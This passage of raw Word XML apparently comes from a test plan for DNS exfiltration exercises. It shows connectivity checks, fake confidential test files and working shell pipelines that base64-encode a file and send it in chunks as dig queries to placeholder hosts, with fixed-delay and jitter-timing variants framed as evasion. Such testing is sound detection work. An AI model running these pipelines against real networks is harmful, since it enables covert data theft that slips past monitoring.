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A86A4" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Verify Connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EC0CBA" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Before any testing, confirm your queries reach both destinations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B142E5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Test Burp Collaborator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35600077" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>dig +short test-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>connectivity.COLLAB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> @DNS_SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFEB4B1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Then check Burp Collaborator client — you should see the query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C66AD83" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A1B51CF" w14:textId="793597E7" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251E3629" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ig +short test-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>connectivity.CUSTOM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>_DOMAIN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> @DNS_SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13109312" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Then check colleague's DNS logs — you should see the query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE6DAA6" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0572C11E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E676196" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>2.4 Test Data Preparation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F17681E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create test files with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recognisable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> content so you can verify successful exfiltration on the receiving end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400242AE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31C4E9C0" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Small Test File (~200 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A482ABD" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>echo "CONFIDENTIAL: Project Falcon budget 4.2M EUR." &gt; exfil_test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9C7324" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>echo "Launch: 15-Oct-2026. Contact: j.smith@corp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.com" &gt;&gt; exfil_test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FA2E28" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C97499" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bulk Test File (~2KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108AD0AD"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for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in $(seq 1 20); do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38742E14"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echo "Record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EmpID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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10000-99999 -n 1) " \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1875B4"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"Salary=$(</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50000-150000 -n 1)" &gt;&gt; exfil_bulk.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31685C53" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAA9F24" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BA7EA64" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Verify Encoding Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D7CEA6" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Before running any scenario, confirm h</w:t>
      </w:r>
      <w:r>
        <w:t>ow many DNS queries it will generate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691FABB7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Count the number of chunks (= number of DNS queries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0B7D85"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cat exfil_test.txt | base64 | tr -d '\n' | fold -w 50 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>wc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DB42B0" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="027BB27A" w14:textId="04899D9C" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
        </w:rPr>
        <w:t>Basic Exfiltration (No Evasion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABFB417" w14:textId="7BE1B78C" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>Rapid Base64 Bulk Exfil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64463B4F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r>
        <w:t>Verify your test file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755E30D8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3984C4EE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3583BF0B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r>
        <w:t>See what the encoded output looks like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A44E802" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> exfil_test.txt | base64 | tr -d '\n' | fold -w 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6085547D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>You should see several lines of base64 characters. Each line will become one DNS query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76072F5A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CB077C6" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r>
        <w:t>Execute against Burp Collaborator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EFA5F1"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base64 | tr -d '\n' | fold -w 50 | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBE0589"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30E743B2"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+short "${chunk</w:t>
      </w:r>
      <w:proofErr w:type="gram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 @DNS_SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331CBEDC"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70D2C46D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60C686E0" w14:textId="1811669E" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r>
        <w:t>Execute against</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> domain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B313430"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base64 | tr -d '\n' | fold -w 50 | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ABF618"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050CDCB3"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+short "${chunk</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>}.CUSTOM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>_DOMAIN" @DNS_SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597B7AAB"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711DE270" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2284C73E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">tep 5: </w:t>
      </w:r>
      <w:r>
        <w:t>Verify receipt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADC665F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Burp: Click 'Poll now' in Collaborator client — you should see each query with the encoded subdomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545023FA" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Colleague: Check DNS logs — each query's subdomain contains a chunk of your encoded data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE17D7F" w14:textId="1E429884" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>Fixed-Delay Exfil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21987311" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680D4E9A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step-by-Step Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618D60A1"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base64 | tr -d '\n' | fold -w 50 | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C0F5E8"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10A66A99"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+short "${chunk</w:t>
      </w:r>
      <w:proofErr w:type="gram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 @DNS_SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B543497"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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487269DC"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6853F110" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7753F256" w14:textId="35295E39" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Repeat against </w:t>
      </w:r>
      <w:r>
        <w:t>domain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A84D349"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base64 | tr -d '\n' | fold -w 50 | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AA9614"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1F4C28BA"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+short "${chunk</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>}.CUSTOM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>_DOMAIN" @DNS_SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C32888"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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F6D5C1"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2C73199E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CCD99FB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1AA5BF" w14:textId="20DED896" w:rsidR="005B2212" w:rsidRDefault="002170E7" w:rsidP="00407471">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
        </w:rPr>
        <w:t>Intermediate Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525559F7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>.1 Scenario 3: Random Jitter Timing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6940CF"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B2212" w14:paraId="6BB6CF0D" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="73E80423" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="26F3A2BC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
